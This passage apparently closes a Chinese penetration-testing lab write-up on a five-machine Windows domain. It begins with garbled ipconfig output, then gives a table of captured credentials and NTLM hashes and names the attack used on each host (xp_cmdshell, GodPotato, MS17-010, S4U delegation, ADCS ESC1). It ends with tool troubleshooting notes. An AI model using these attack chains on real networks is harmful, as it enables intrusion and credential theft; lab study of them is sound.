������ַ. . . . . . . . . . . . . : 00-0C-29-C0-A7-E3
DHCP ������ . . . . . . . . . . . : ��
�Զ�����������. . . . . . . . . . : ��
�������� IPv6 ��ַ. . . . . . . . : fe80::6c5e:c9fa:6c0e:8631%7(��ѡ)
IPv4 ��ַ . . . . . . . . . . . . : 172.22.10.13(��ѡ)
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . : 172.22.10.1
DHCPv6 IAID . . . . . . . . . . . : 50334761
DHCPv6 �ͻ��� DUID . . . . . . . : 00-01-00-01-31-4F-BF-E8-00-0C-29-C0-A7-E3
DNS ������ . . . . . . . . . . . : 172.22.10.11
TCPIP �ϵ� NetBIOS . . . . . . . : ������
���������� isatap.{5CEEAE8C-B32F-4748-9055-D376DCB758DA}:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
����. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
������ַ. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP ������ . . . . . . . . . . . : ��
�Զ�����������. . . . . . . . . . : ��
C:\>
|
CA 拿下!至此五台机器全部沦陷。
收获总结#
获取的所有凭据#
| 机器 | 账户 | 类型 | 明文密码 | NTLM Hash |
|---|
| Web01 (172.22.10.22) | sa | MSSQL SA | 123456 | - |
| WIN-PC8086 (172.22.10.36) | John | 本地用户 | John@123 | 5ffb08c80d9f260355e01c17a233e8f1 |
| WIN-PC8086 (172.22.10.36) | WIN-PC8086$ | 机器账户 | - | 1878248073dc58f665227675e99b8333 |
| WIN-PC8098 (172.22.10.40) | hacker | 本地管理员(新建) | P@ssw0rd123 | 89551acff8895768e489bb3054af94fd |
| WIN-PC8098 (172.22.10.40) | WIN-PC8098$ | 机器账户 | - | 4b871bde5de48e8b344eeba86e8c08ee |
| aerospace.local 域 | liuyuhua | 域用户 | Yu%a#E8T6iR | 2c8e4ec4d8a61869d85c7921c6076dfd |
| aerospace.local 域 | Administrator | 域管理员 | P@ssw0rd2024!(已修改) | - |
拿下的机器#
| 机器 | IP | 获取权限 | 攻击方式 |
|---|
| Web01 | 192.168.93.146 / 172.22.10.22 | NT AUTHORITY\SYSTEM | MSSQL xp_cmdshell + GodPotato 提权 |
| WIN-PC8086 | 172.22.10.36 | NT AUTHORITY\SYSTEM | MS17-010 永恒之蓝 |
| WIN-PC8098 | 172.22.10.40 | aerospace\administrator | 约束委派 S4U2Self + S4U2Proxy |
| DC01 | 172.22.10.11 | aerospace\administrator | ADCS ESC1 + LDAP Shell 改密码 |
| CA | 172.22.10.13 | aerospace\administrator | 域管密码横向移动 |
涉及的核心技术点#
- MSSQL 渗透:弱口令爆破 → xp_cmdshell 命令执行 → PowerShell 反弹 Shell
- Windows 提权:利用 SeImpersonatePrivilege + GodPotato 从服务账户提权到 SYSTEM
- MS17-010 永恒之蓝:经典 SMB 远程代码执行漏洞,直接获取 SYSTEM 权限
- Mimikatz 凭据抓取:从内存中提取明文密码、NTLM Hash、机器账户凭据
- 约束委派攻击(Constrained Delegation):S4U2Self / S4U2Proxy 协议滥用,模拟域管访问目标服务
- ADCS ESC1 漏洞:错误配置的证书模板(
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)允许冒充任意用户申请证书 - PKINIT 不可用时的替代方案:通过 Schannel 认证 LDAPS,使用 LDAP Shell 修改域管密码
- 横向移动:Pass-the-Password 通过 WMI 远程执行获取域内其他机器权限
踩坑记录#
- 票据保存权限:
getST.py 在只读目录(如 /usr/share/doc/)下执行会 Permission Denied,需用 root 或切换到可写目录 - DNS 解析问题:Kerberos 认证依赖主机名解析,必须在
/etc/hosts 中添加目标机器的解析记录 - xfreerdp 语法变化:新版 xfreerdp 使用
/cert:ignore 而非 -cert-ignore - PKINIT 不支持:DC 不支持证书直接换 TGT 时,需改用 LDAP Shell(Schannel)方式
- certipy DNS 解析:需指定
-ns 和 -dc-ip 参数使用域控 DNS,否则默认 DNS 无法解析内网域名